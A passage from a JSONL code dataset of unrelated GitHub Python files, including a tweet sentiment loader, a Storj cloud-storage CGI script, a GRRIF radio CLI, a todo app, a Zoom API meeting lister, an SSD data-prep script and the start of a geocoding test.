df_pos[4].tolist() + df_neg[4].tolist()\n\tlabels = [int(i) for i in labels]\n\treturn database, labels\n\ndef political_data():\n\tdf = pd.read_csv('labeled_samples.csv', index_col=[0])\n\tdatabase = df['text'].tolist()\n\tlabels = df['label'].tolist()\n\treturn database, labels\n\t\ndef pos_neg():\n\tdatabase = []\n\tlabels = []\n\tfiles = ['negativos_stream_download.json', 'positivos_stream_download.json']\n\tfor file in files:\n\t\twith open(file, 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\ttry:\n\t\t\t\t\ttweet = json.loads(line)\n\t\t\t\t\ttry: \n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tx = ('from RT extended_full_text')\n\t\t\t\t\t\t\ttext = tweet[\"retweeted_status\"][\"extended_tweet\"][\"full_text\"]\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tx = ('from RT extended_text')\n\t\t\t\t\t\t\ttext = tweet[\"retweeted_status\"][\"text\"]\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tx = ('from extended_text')\n\t\t\t\t\t\t\ttext = tweet[\"extended_tweet\"][\"full_text\"]\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tx = ('from text')\n\t\t\t\t\t\t\ttext = tweet[\"text\"]\n\t\t\t\t\tdatabase.append(str(text))\n\t\t\t\t\tif 'negativo' in file:\n\t\t\t\t\t\tlabels.append(0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlabels.append(1)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\treturn database, labels\n","repo_name":"anjosma/sentiment-analysis_brazil-elections-2018","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"34157435211","text":"#!/usr/bin/python3\nprint(\"Content-Type:text/html;charset=utf-8\")\nprint()\nfrom array import array\nfrom datetime import datetime\nfrom uplink_python.errors import StorjException, BucketNotEmptyError, BucketNotFoundError\nfrom uplink_python.module_classes import ListObjectsOptions, Permission, SharePrefix\nfrom uplink_python.uplink import Uplink\nfrom dotenv import load_dotenv\nimport os\nimport sys\nimport requests\nimport cgi \nimport cgitb; cgitb.enable()\nimport json\n\n# LOAD CONTAINER VARIABLES\nload_dotenv()\n\nclass Credentials():\n def __init__(self):\n # Storj configuration information\n global api_key, satellite, encryption_passphrase, bucket, src_full_name, destination_full_filename\n api_key = os.getenv('API_KEY')\n satellite = os.getenv('SATELLITE')\n encryption_passphrase = os.getenv('ENCRYPTION_PASSPHRASE')\n bucket = \"uplink\"\n src_full_name = \"/Users/cloudninja/Desktop/ipfs.png\" # Source and destination path and file name for testing\n destination_full_filename =\"/Users/cloudninja/Desktop/ipfs3.png \"\n\nclass Methods():\n\n def StablishConnection(self):\n try:\n # create an object of Uplink class\n uplink = Uplink()\n # request access using passphrase\n #print(\"\\nRequesting Access using passphrase...\")\n access = uplink.request_access_with_passphrase(satellite, api_key,\n encryption_passphrase)\n #print(\"Request Access: SUCCESS!\")\n \n # open Storj project\n #print(\"\\nOpening the Storj project, corresponding to the parsed Access...\")\n project = access.open_project()\n #print(\"Desired Storj project: OPENED!\")\n return project\n #\n except StorjException as exception:\n print(\"Exception Caught: \", exception.details)\n\n def EnlistAllBuckets(self,project):\n try:\n # enlist all the buckets in given Storj project\n #print(\"\\nListing bucket's names and creation time...\")\n bucket_list = project.list_buckets()\n json_output = []\n for bucket in bucket_list:\n # as python class object\n # print(bucket.name, \" | \", datetime.fromtimestamp(bucket.created))\n # # as python dictionary\n data = bucket.get_dict()\n json_output.append(data)\n print(json_output)\n #print(\"Buckets listing: COMPLETE!\")\n #\n except StorjException as exception:\n print(\"Exception Caught: \", exception.details)\n\n def ListObject(self,project):\n try:\n # list objects in given bucket with above options or None\n #print(\"\\nListing object's names...\")\n objects_list = project.list_objects(bucket, ListObjectsOptions(recursive=True,\n system=True))\n # print all objects path\n json_output = []\n for obj in objects_list:\n # print(obj.key, \" | \", obj.is_prefix) # as python class object\n # print(obj.get_dict()) # as python dictionary\n data = obj.get_dict()\n json_output.append(data)\n print(json.dumps(json_output))\n #print(\"Objects listing: COMPLETE!\")\n #\n except StorjException as exception:\n print(\"Exception Caught: \", exception.details)\n\n def UploadObject(self,project,file_item):\n try:\n # upload file/object\n #print(\"\\nUploading data...\")\n # get handle of file to be uploaded\n # file_handle = open(src_full_name, 'r+b')\n # check if the file has been uploaded\n if file_item.filename:\n # strip the leading path from the file name\n fn = os.path.basename(file_item.filename)\n \n # open read and write the file into the server\n file_handle = open(fn, 'r+b').write(file_item.file.read())\n\n # get upload handle to specified bucket and upload file path\n upload = project.upload_object(bucket, file_item.filename)\n #\n # upload file on storj\n upload.write_file(file_handle)\n #\n # commit the upload\n upload.commit()\n # close file handle\n file_handle.close()\n print(\"Upload: Complete!\")\n #\n else:\n print(\"Upload Failed\")\n except StorjException as exception:\n print(\"Exception Caught: \", exception.details)\n \n def DownloadObject(self,project):\n try:\n # download file/object\n print(\"\\nDownloading data...\")\n # get handle of file which data has to be downloaded\n file_handle = open('/var/www/html/master/dcs-api/test/andres.txt', 'w+b')\n # get download handle to specified bucket and object path to be downloaded\n download = project.download_object(bucket, 'andres.txt') #Bucket, filename inside bucket\n #\n # download data from storj to file\n download.read_file(file_handle)\n #\n # close the download stream\n download.close()\n # close file handle\n file_handle.close()\n #print(json.dumps(\"message: Download Complete\"\n print(\"Download: COMPLETE!\")\n #\n except StorjException as exception:\n print(\"Exception Caught: \", exception.details)\n","repo_name":"lcubestudios/dcs-api","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1961920201","text":"### [ GRRIF Tools by Julien 'fetzu' Bono ]\n## [ IMPORTS ]\nimport sys\nimport argparse\nfrom datetime import date, datetime\n\n## [ CONFIGURATION ]\n__version__ = \"0.8.1\"\n\n## [ Is CLI even cooler with argparse? ]\nparser = argparse.ArgumentParser(\n description=\"A set of tools for Cool Cats™. Allows you to archive GRRIF's play history and scrobble it to last.fm (upcoming).\"\n)\n\nsubparsers = parser.add_subparsers(dest=\"command\")\n\narchive_parser = subparsers.add_parser(\"archive\", help=\"Archive GRRIF's play history.\")\narchive_parser.add_argument(\n \"destination\",\n choices=[\"print\", \"db\", \"txt\"],\n help=\"Specify where to archive the play history (print to stdout, save to SQLite database or to text in YYYY/MM/DD.txt file(s)).\",\n)\narchive_parser.add_argument(\n \"from_date\",\n nargs=\"?\",\n default=\"2021-01-01\",\n help=\"Specify the start date for the archive in YYYY-MM-DD format. Defaults to 2021-01-01.\",\n)\narchive_parser.add_argument(\n \"to_date\",\n nargs=\"?\",\n default=date.today().strftime(\"%Y-%m-%d\"),\n help=f\"Specify the start date for the archive in YYYY-MM-DD format. Defaults to today ({date.today().strftime('%Y-%m-%d')}).\",\n)\n\nstats_parser = subparsers.add_parser(\n \"stats\", help=\"Get some stats out of the database.\"\n)\nstats_subparsers = stats_parser.add_subparsers(dest=\"stats_command\")\nartists_parser = stats_subparsers.add_parser(\n \"artists\", help=\"Display stats for artists\"\n)\nartists_parser.add_argument(\n \"topofthepop\",\n choices=[\"top10\", \"top25\", \"top100\"],\n help=\"Display the top 10, 25 or 100 artists.\",\n)\nartists_parser.add_argument(\n \"from_date\",\n nargs=\"?\",\n default=\"2021-01-01\",\n help=\"Specify the start date for the stats in YYYY-MM-DD format. Defaults to 2021-01-01.\",\n)\nartists_parser.add_argument(\n \"to_date\",\n nargs=\"?\",\n default=date.today().strftime(\"%Y-%m-%d\"),\n help=f\"Specify the start date for the stats in YYYY-MM-DD format. Defaults to today ({date.today().strftime('%Y-%m-%d')}).\",\n)\ntracks_parser = stats_subparsers.add_parser(\"tracks\", help=\"Display stats for tracks\")\ntracks_parser.add_argument(\n \"topofthepop\",\n choices=[\"top10\", \"top25\", \"top100\"],\n help=\"Display the top 10, 25 or 100 tracks.\",\n)\ntracks_parser.add_argument(\n \"from_date\",\n nargs=\"?\",\n default=\"2021-01-01\",\n help=\"Specify the start date for the stats in YYYY-MM-DD format. Defaults to 2021-01-01.\",\n)\ntracks_parser.add_argument(\n \"to_date\",\n nargs=\"?\",\n default=date.today().strftime(\"%Y-%m-%d\"),\n help=f\"Specify the start date for the stats in YYYY-MM-DD format. Defaults to today ({date.today().strftime('%Y-%m-%d')}).\",\n)\n\nscrobble_parser = subparsers.add_parser(\n \"scrobble\",\n help=\"Scrobble to Last.fm.\",\n)\nscrobble_subparsers = scrobble_parser.add_subparsers(dest=\"scrobble_command\")\n\nsettings_parser = scrobble_subparsers.add_parser(\n \"settings\", help=\"Set your last.fm scrobbling settings\"\n)\nsettings_parser.add_argument(\n \"API_KEY\",\n type=str,\n help=\"Your last.fm API Key\",\n)\nsettings_parser.add_argument(\n \"API_SECRET\",\n type=str,\n help=\"Your last.fm API secret\",\n)\nsettings_parser.add_argument(\n \"SESSION_KEY\",\n type=str,\n help=\"Your last.fm API session key\",\n)\n\nlivescrobble_parser = scrobble_subparsers.add_parser(\n \"start\", help=\"Start scrobbling to last.fm now.\"\n)\n\n\nstream_parser = subparsers.add_parser(\n \"play\",\n help=\"Play GRRIF in your terminal!\",\n).add_argument(\n \"quality\",\n choices=[\"mp3_high\", \"mp3_low\", \"aac_high\"],\n nargs=\"?\",\n default=\"mp3_high\",\n help=\"Specify streaming quality (default: mp3_high)\",\n)\n\nargs = parser.parse_args()\n\n\n## [ MAIN ]\ndef main():\n print(\n \"##########################################\\n\"\n f\"##### [ GRRIF Tools version {__version__} ] ######\\n\"\n \"##########################################\\n\"\n )\n\n # Displays argparse's help message if no arguments are given\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n if args.command == \"archive\" or args.command == \"stats\":\n # Set the base URL to scrape data from\n BASE_URL = \"https://www.grrif.ch/recherche-de-titres/?date={}\"\n\n # Set the date range to scrape data for\n START_DATE = datetime.strptime(args.from_date, \"%Y-%m-%d\")\n END_DATE = datetime.strptime(args.to_date, \"%Y-%m-%d\")\n\n # Archive was passed !\n if args.command == \"archive\":\n # The \"save to SQLite database\" option was chosen\n if args.destination == \"db\":\n # Let the user know what we are attempting\n print(\n f\"Attempting to archive plays from {START_DATE.strftime('%Y-%m-%d')} to {END_DATE.strftime('%Y-%m-%d')} to a SQLite database.\"\n )\n\n # Import the necessary functions\n from .grrif_archiver import plays_to_db\n\n # Create/open the database\n plays_to_db(BASE_URL, START_DATE, END_DATE)\n\n # The \"save to text files\" option was chosen\n if args.destination == \"txt\":\n # Let the user know what we are attempting\n print(\n f\"Attempting to archive plays from {START_DATE.strftime('%Y-%m-%d')} to {END_DATE.strftime('%Y-%m-%d')} to text files.\"\n )\n\n # Import the necessary functions\n from .grrif_archiver import plays_to_txt\n\n # Create/open the database\n plays_to_txt(BASE_URL, START_DATE, END_DATE)\n\n # The \"output data to stdout\" option was chosen\n if args.destination == \"print\":\n # Let the user know what we are attempting\n print(\n f\"Attempting to print plays from {START_DATE.strftime('%Y-%m-%d')} to {END_DATE.strftime('%Y-%m-%d')} to stdout.\"\n )\n\n # Import the necessary functions\n from .grrif_archiver import plays_to_stdout\n\n # Create/open the database\n plays_to_stdout(BASE_URL, START_DATE, END_DATE)\n\n # Stats was passed !\n if args.command == \"stats\":\n # Import the necessary functions\n from .grrif_stats import topofthepop\n\n if args.stats_command == \"artists\":\n if args.topofthepop == \"top10\":\n topofthepop(\"artist\", \"10\", START_DATE, END_DATE)\n if args.topofthepop == \"top25\":\n topofthepop(\"artist\", \"25\", START_DATE, END_DATE)\n if args.topofthepop == \"top100\":\n topofthepop(\"artist\", \"100\", START_DATE, END_DATE)\n\n if args.stats_command == \"tracks\":\n if args.topofthepop == \"top10\":\n topofthepop(\"artist, title\", \"10\", START_DATE, END_DATE)\n if args.topofthepop == \"top25\":\n topofthepop(\"artist, title\", \"25\", START_DATE, END_DATE)\n if args.topofthepop == \"top100\":\n topofthepop(\"title\", \"100\", START_DATE, END_DATE)\n\n # Scrobble was passed !\n if args.command == \"scrobble\":\n\n if args.scrobble_command == \"settings\":\n if args.API_KEY is not None and args.API_SECRET is not None and args.SESSION_KEY is not None:\n # Write the settings to file\n import os\n current_path = os.path.dirname(os.path.abspath(__file__))\n settings_path = os.path.join(current_path, \"grrif_secrets.py\")\n settings_content = f\"API_KEY = '{args.API_KEY}'\\nAPI_SECRET = '{args.API_SECRET}'\\nSESSION_KEY = '{args.SESSION_KEY}'\\n\"\n with open(settings_path, \"w\") as settings_file:\n settings_file.write(settings_content)\n else:\n print(\"Invalid number of arguments passed, API Key, API Secret and Session Key are needed.\")\n\n if args.scrobble_command == \"start\":\n from .grrif_scrobbler import start_scrobbling\n start_scrobbling(\"0\")\n\n # Play was passed !\n if args.command == \"play\":\n from .grrif_player import start_playback\n start_playback(args.quality)\n ","repo_name":"fetzu/grrif_tools","sub_path":"grrif_tools/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28536494602","text":"import argparse\nimport sys\nimport os\nimport sqlite3\nfrom datetime import datetime\n\ndef find_project_directory():\n current_dir = os.path.abspath(os.getcwd())\n while current_dir != os.path.dirname(current_dir):\n if os.path.isdir(os.path.join(current_dir, \".git\")):\n if os.stat(os.path.join(current_dir, \".git\")).st_uid == os.getuid():\n return current_dir\n current_dir = os.path.dirname(current_dir)\n return None\n\ndef get_database_path():\n project_dir = find_project_directory()\n if project_dir:\n return os.path.join(project_dir, \".todo.db\")\n return os.path.expanduser(\"~/.local/share/todo.db\")\n\ndef initialize_database(database_path):\n conn = sqlite3.connect(database_path)\n conn.execute('''CREATE TABLE IF NOT EXISTS todos\n (id INTEGER PRIMARY KEY, todo TEXT, created_at TIMESTAMP, done BOOLEAN)''')\n return conn\n\ndef print_todos(conn):\n for row in conn.execute(\"SELECT * FROM todos WHERE done = 0 ORDER BY created_at ASC\"):\n print(f\"{row[2]}: {row[1]}\")\n\ndef add_todo(conn, todo):\n conn.execute(\"INSERT INTO todos (todo, created_at, done) VALUES (?, ?, 0)\", (todo, datetime.now()))\n conn.commit()\n\ndef mark_done(conn, todo):\n conn.execute(\"UPDATE todos SET done = 1 WHERE todo = ? AND done = 0\", (todo,))\n conn.commit()\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"A simple command line todo app.\")\n parser.add_argument(\"todo\", nargs=\"*\", help=\"The todo to be added or marked as done.\")\n parser.add_argument(\"--done\", action=\"store_true\", help=\"Mark a todo as done.\")\n return parser.parse_args()\n\ndef main():\n args = parse_arguments()\n\n database_path = get_database_path()\n conn = initialize_database(database_path)\n \n if args.done:\n if args.todo:\n mark_done(conn, \" \".join(args.todo))\n else:\n print(\"Usage: todo.py --done \\\"TODO text\\\"\")\n elif args.todo:\n add_todo(conn, \" \".join(args.todo))\n else:\n print_todos(conn)\n\n conn.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mortehu/shellutils","sub_path":"shellutils/todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12405204982","text":"from typing import Optional\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n \"\"\"\n Given the root of a binary search tree, and an integer k,\n return the kth smallest value (1-indexed) of all the values of the nodes in the tree.\n \"\"\"\n stack = []\n curr = root\n #while stack is still nonempty or curr is not leaf\n while stack or curr:\n #while not leaf, iterate left to find smaller values (moving through left side of tree)\n while curr:\n #append to stack\n stack.append(curr)\n curr = curr.left\n #once hit leaf, pop stack to go back to value\n curr = stack.pop()\n #subtract k by 1\n k-= 1\n #if k == 0 (at kth smallest value), return k\n if k == 0:\n return curr.val\n #otherwise, continue iterating through tree\n curr = curr.right\n ","repo_name":"JamesAlexanderLeak/leetcodeProblems","sub_path":"230_Kth_Smallest_Element_in_a_BST.py","file_name":"230_Kth_Smallest_Element_in_a_BST.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22396055813","text":"import requests\nimport jwt\nimport json\nfrom datetime import datetime, timedelta\nimport logging\nimport time\n\n\"\"\"\nMore information on Zoom API's can be found at:\nAPI documentation\nhttps://marketplace.zoom.us/docs/api-reference/introduction\n\nSDK Documentation\nhttps://marketplace.zoom.us/docs/sdk/native-sdks/preface/introducing-zoom-sdk\n\nMarketplace Documentation\nhttps://marketplace.zoom.us/docs\n\nDeveloper Forum\nhttps://devforum.zoom.us/\n\nZoom Github\nhttps://github.com/zoom\n\"\"\"\n\n####################################\n# CONFIGURE VARIABLES #\n####################################\n\"\"\"\nChange the variables in this section using you API_KEY and SECRET from the Zoom Marketplace https://marketplace.zoom.us\nJWT_EXPIRY should be an Integer in seconds\nDO NOT change the base URL\n\"\"\"\nAPI_KEY = \"YOUR API KEY\"\nAPI_SECRET = \"YOUR API SECRET\"\nJWT_EXPIRY = 60\nBASE_URL = 'https://api.zoom.us/v2/'\n\n\n####################################\n# CONFIGURE LOGGING #\n####################################\n\"\"\"\nThis configuration will save a log file into the same folder as the *.py file\n\"\"\"\nlogging.basicConfig(filename='logfile.log',level=logging.DEBUG, format='%(levelname)s %(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\n\n###########################################\n# DO NOT CHANGE ANYTHING BELOW THIS LINE #\n###########################################\n\n# Function to create JWT Token\n\ndef jwt_token():\n exp_time = datetime.utcnow() + timedelta(seconds =JWT_EXPIRY)\n payload = {'iss' : API_KEY, 'exp' : exp_time}\n headers = {'alg' : 'HS256', 'typ' : 'JWT'}\n token = str(jwt.encode(headers = headers, payload = payload, key = API_SECRET, algorithm = 'HS256'), 'utf-8')\n return(token)\n\n# REQUEST FUNCTIONS\n\n\"\"\"\nGet JWT token, assemble headers, assemble endpoint URL, Log URL and Headers, send get request.\nIf status is not 200 log warning otherwise log response content as info\nreturn response content\n\"\"\"\ndef send_get_request(endpoint):\n token = jwt_token()\n headers = {\"authorization\" : \"Bearer %s\" % token, \"content-type\" : \"application/json\"}\n FINAL_URL = BASE_URL + endpoint\n logging.debug(\"'{0}', '{1}'\".format(FINAL_URL, headers))\n r = requests.get(FINAL_URL, headers = headers)\n if r.status_code != 200:\n logging.warning(\"'{0}'\".format(r.content))\n logging.info(\"'{0}'\".format(r.content))\n return r.content\n\n\n\ndef list_users():\n logging.info('list_users')\n url = '/users'\n user_list = []\n response = send_get_request(url)\n encoded_data=json.loads(response)\n for item in encoded_data['users']:\n user = item['id']\n user_list.append(user)\n return(user_list)\n\ndef get_meetings(userID):\n logging.info('get meetings: %s' % userID)\n url = '/users/%s/meetings' % userID\n response = send_get_request(url)\n return(response)\n\ndef get_all_meetings():\n logging.info('get all meetings')\n user_list = list_users()\n date_format = \"%Y-%m-%dT%H:%M:%SZ\"\n for user in user_list:\n meetings = get_meetings(user)\n encoded_data=json.loads(meetings)\n for item in encoded_data['meetings']:\n meeting_type = item['type']\n if meeting_type == '2':\n mstart_time = item['start_time']\n ftime = datetime.strptime(mstart_time, date_format)\n if ftime > datetime.now():\n print(item)\n time.sleep(.300)\n\nget_all_meetings()","repo_name":"shirus172/Zoom-v2-API-projects","sub_path":"list_upcoming_meetings.py","file_name":"list_upcoming_meetings.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36889966958","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def findDistance(self, root: Optional[TreeNode], p: int, q: int) -> int:\n \n def find_path_node(cur_root, target):\n if cur_root is None:\n return False, list()\n if cur_root.val == target:\n return True, [cur_root.val]\n \n lflag, lt = find_path_node(cur_root.left, target)\n if lflag:\n lt.append(cur_root.val)\n return True, lt\n rflag, rt = find_path_node(cur_root.right, target)\n if rflag:\n rt.append(cur_root.val)\n return True, rt\n \n return False, list()\n \n pflag, p_path = find_path_node(root, p)\n qflag, q_path = find_path_node(root, q)\n \n if p in q_path:\n indx = q_path.index(p)\n return indx\n \n if q in p_path:\n indx = p_path.index(q)\n return indx\n \n i = len(p_path) - 1\n j = len(q_path) - 1\n while p_path[i] == q_path[j]:\n i -= 1\n j -= 1\n return i + j + 2","repo_name":"KushalSatrasala/PracticingCode","sub_path":"1740-find-distance-in-a-binary-tree/1740-find-distance-in-a-binary-tree.py","file_name":"1740-find-distance-in-a-binary-tree.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38897747825","text":"from traitlets import Instance, Float, Integer\nfrom common import ComponentBase, action\nfrom common.save import DataSaver\nfrom common.traits import DataSet as DataSetTrait\nfrom datasources.terak15 import TeraK15\n\nclass AppRoot(ComponentBase):\n\n dataSaver = Instance(DataSaver)\n terak15 = Instance(TeraK15)\n currentMeasurement = DataSetTrait().tag(name=\"Current measurement\",\n data_label=\"Amplitude\",\n axes_labels=[\"Time\"])\n\n progress = Float(0, min=0, max=1, read_only=True).tag(name=\"Progress\")\n nMeasurements = Integer(1, min=1).tag(name=\"No. of measurements\", priority=99)\n\n def __init__(self, objectName=None, loop=None):\n super().__init__(objectName=\"Measurement\", loop=loop)\n self.title = \"Taipan\"\n\n self.dataSaver = DataSaver(objectName=\"Data Saver\")\n self.terak15 = TeraK15(name_or_ip=\"192.168.134.80\", objectName=\"TeraK15\", loop=loop)\n\n async def __aenter__(self):\n await super().__aenter__()\n return self\n\n @action(\"Take measurements\")\n async def takeMeasurements(self):\n for i in range(self.nMeasurements):\n self.set_trait(\"progress\", i / self.nMeasurements)\n self.set_trait(\"currentMeasurement\", await self.terak15.readDataSet())\n self.dataSaver.process(self.currentMeasurement)\n\n self.set_trait(\"progress\", 1)\n\n\n async def __aexit__(self, *args):\n await super().__aexit__(*args)\n","repo_name":"Owlbearpig/taipan","sub_path":"taipan/terak15_standalone.py","file_name":"terak15_standalone.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18500957492","text":"from settings import *\nimport numpy as np\nfrom tfrecord_read_write import read_and_decode\nimport pickle\n\ndef calc_iou(box_a, box_b):\n \"\"\"\n\tCalculate the Intersection Over Union of two boxes\n\tEach box specified by upper left corner and lower right corner:\n\t(x1, y1, x2, y2), where 1 denotes upper left corner, 2 denotes lower right corner\n\n\tReturns IOU value\n\t\"\"\"\n\t# Calculate intersection, i.e. area of overlap between the 2 boxes (could be 0)\n\t# http://math.stackexchange.com/a/99576\n\t# x_overlap = max(0, min(r1.right, r2.right)-max(r1.left, r2.left))\n\t#y_overlap = max(0, min(r1.bottom, r2.bottom) - max(r1.top, r2.top))\n\t#overlapArea = x_overlap * y_overlap\n\n # r1[right], r2[right] r1[left], r2[left]\n x_overlap = max(0, min(box_a[2], box_b[2]) - max(box_a[0], box_b[0]))\n\t\n\t# r1[bottom], r2[bottom] r1[top], r2[top]\n y_overlap = max(0, min(box_a[3], box_b[3]) - max(box_a[1], box_b[1]))\n intersection = x_overlap * y_overlap #Masahat area with overlap مساحت ناحیه ی همپوشانی\n\n\t# Calculate union\n\t#Masahat r1 r1.Right - r1.Left r1.Bottom - r1.Top مساحت باکس a\n area_box_a = (box_a[2] - box_a[0]) * (box_a[3] - box_a[1])\n\n\t#Masahat r2 r2.Right - r2.Left r1.Bottom - r1.Top مساحت باکس b\n area_box_b = (box_b[2] - box_b[0]) * (box_b[3] - box_b[1])\n\t# (A xor B)=> r1 xor r2\n union = area_box_a + area_box_b - intersection #masahat area without overlap\n\t\n iou = np.divide(intersection , union, dtype=np.float) # مقدار همپوشانی باکس های a, b\n\t\n return iou\n\ndef find_gt_boxes(image_file, tag, gt_bboxes):\n \n signs_class = []\n signs_box_coords = [] \n for i in range(int(len(gt_bboxes)/4)):\n start_index, end_index = i*4, i*4+4\n signs_class.append(tag)\n scale = np.array([IMG_W, IMG_H, IMG_W, IMG_H])\n box_coords = np.divide(np.array(gt_bboxes[start_index:end_index]),scale, dtype=np.float)\n if(box_coords[0]==0. and box_coords[1]==0. and box_coords[2]==0. and box_coords[3]==0.):\n continue\n signs_box_coords.append(box_coords)\n\n y_ture_len = 0\n for fm_size in FM_SIZES:\n y_ture_len += fm_size[0] * fm_size[1]* NUM_DEFAULT_BOXES\n \n y_true_conf = np.zeros(y_ture_len)\n y_true_loc = np.zeros(y_ture_len*4)\n\n match_counter = 0\n for i, gt_box_coords in enumerate(signs_box_coords):\n y_true_idx = 0\n\n for fm_size in FM_SIZES:\n fm_h, fm_w = fm_size\n for row in range(fm_h):\n for col in range(fm_w):\n for db in DEFAULT_BOXES:\n x1_offset, y1_offset, x2_offset, y2_offset = db\n abs_db_box_coords = np.array([\n\t\t\t\t\t\t\tmax(0, col + x1_offset),\n\t\t\t\t\t\t\tmax(0, row + y1_offset),\n\t\t\t\t\t\t\tmin(fm_w, col+1 + x2_offset),\n\t\t\t\t\t\t\tmin(fm_h, row+1 + y2_offset)\n\t\t\t\t\t\t])\n '''abs_db_box_coords = np.array([\n\t\t\t\t\t\t\tmax(0, col + col*x1_offset),\n\t\t\t\t\t\t\tmax(0, row + row*y1_offset),\n\t\t\t\t\t\t\tmin(fm_w, col+1 + col*x2_offset),\n\t\t\t\t\t\t\tmin(fm_h, row+1 + row*y2_offset)\n\t\t\t\t\t\t])'''\n scale = np.array([fm_w, fm_h, fm_w, fm_h])\n db_box_coords = np.divide(abs_db_box_coords , scale, dtype=np.float)\n if col==20 and row==20:\n stop_check_point=0\n iou = calc_iou(gt_box_coords, db_box_coords)\n\n if iou >= IOU_THRESH:\n \t\t\t\t\t\t\t# Update y_true_conf to reflect we found a match, and increment match_counter\n y_true_conf[y_true_idx] = signs_class[i]\n match_counter += 1\n\n #print('(%d,%d)/'%(row,col))\n\n\t\t\t\t\t\t\t# مختصات پنجره یافته شده را نرمال کرده و در y_true_loc اضافه می کند\n\t\t\t\t\t\t\t# Calculate normalized box coordinates and update y_true_loc\n abs_box_center = np.array([col + 0.5, row + 0.5]) # absolute coordinates of center of feature map cell\n abs_gt_box_coords = gt_box_coords * scale # absolute ground truth box coordinates (in feature map grid)\n norm_box_coords = abs_gt_box_coords - np.concatenate((abs_box_center, abs_box_center))\n y_true_loc[y_true_idx*4 : y_true_idx*4 + 4] = norm_box_coords\n\n y_true_idx += 1\n\n return y_true_conf, y_true_loc, match_counter\n\ndef do_data_prep(): \n data_prep = {}\n\n filename_queue = tf.train.string_input_producer([TFRECORD_ADDRESS], num_epochs=1 )\n image, tag, bboxes = read_and_decode(TFRECORD_ADDRESS, filename_queue)\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n \n with tf.Session() as sess:\n sess.run(init_op)\n \n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n\n for i in range(TOTAL_DATA_TO_READ_FROM_TFRECORD):\n image_filename, label, gt_box_coords = sess.run([image, tag, bboxes]) #read_single_data_from_tfrecord(TFRECORD_ADDRESS)\n y_true_conf, y_true_loc, match_counter = find_gt_boxes(image_filename, label, gt_box_coords)\n if match_counter > 0:\n data_prep[image_filename] = {'y_true_conf': y_true_conf, 'y_true_loc': y_true_loc}\n print('%s/%s, matche_numbers: %s'%(i,614, match_counter))\n return data_prep\n\nif __name__ == '__main__':\n data_prep = do_data_prep()\n\n with open('data+prep_%sx%s.p'%(IMG_W, IMG_H), 'wb') as f:\n pickle.dump(data_prep, f, protocol=2)\n \n print('Done. Saved prepared data to data_prep_%sx%s.p' % (IMG_W, IMG_H))\n print('Total images with >=1 matching box: %d' % len(data_prep.keys()))","repo_name":"mortezamg63/TFRecord_CalTech_Pedestrian_Dataset","sub_path":"data_prep_INIRIA.py","file_name":"data_prep_INIRIA.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3410245631","text":"# This Python file uses the following encoding: utf-8\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nimport common.urllib_adaptor as urllib2\nfrom common.geo_calculations import distance_between_points\nfrom common.geocode import geocode, geohash_encode, geohash_decode\nfrom common.sms_notification import send_sms\nfrom common.route import calculate_time_and_distance\nfrom common.util import gen_verification_code\nimport logging\n\nclass GeocodeTest(TestCase):\n \"\"\"\n Geocoding unitTest: geo coding, geo distance and geo hashing tests.\n \"\"\"\n\n def test_geo_coding(self):\n \"\"\"\n Check that geocoding returns at least one location with correct geocode,\n i.e., country, city, street, house number, lon. and lat. are matching those of the query.\n \"\"\"\n test_data = (\n {\"address\" : u\"דיזנגוף 99 תל אביב\",\n \"country\" : u\"IL\",\n \"city\" : u\"תל אביב יפו\",\n \"street_address\" : u\"דיזנגוף\",\n \"house_number\" : u\"99\",\n \"lon\" : '34.77388',\n \"lat\" : '32.07933',\n },\n {\"address\" : u\"מרג 1 תל אביב יפו\",\n \"country\" : u\"IL\",\n \"city\" : u\"תל אביב יפו\",\n \"street_address\" : u\"מרגולין\",\n \"house_number\" : u\"1\",\n \"lon\" : '34.787368',\n \"lat\" : '32.05856',\n },\n {\"address\" : u\"בן יהודה 35 ירושלים\",\n \"country\" : 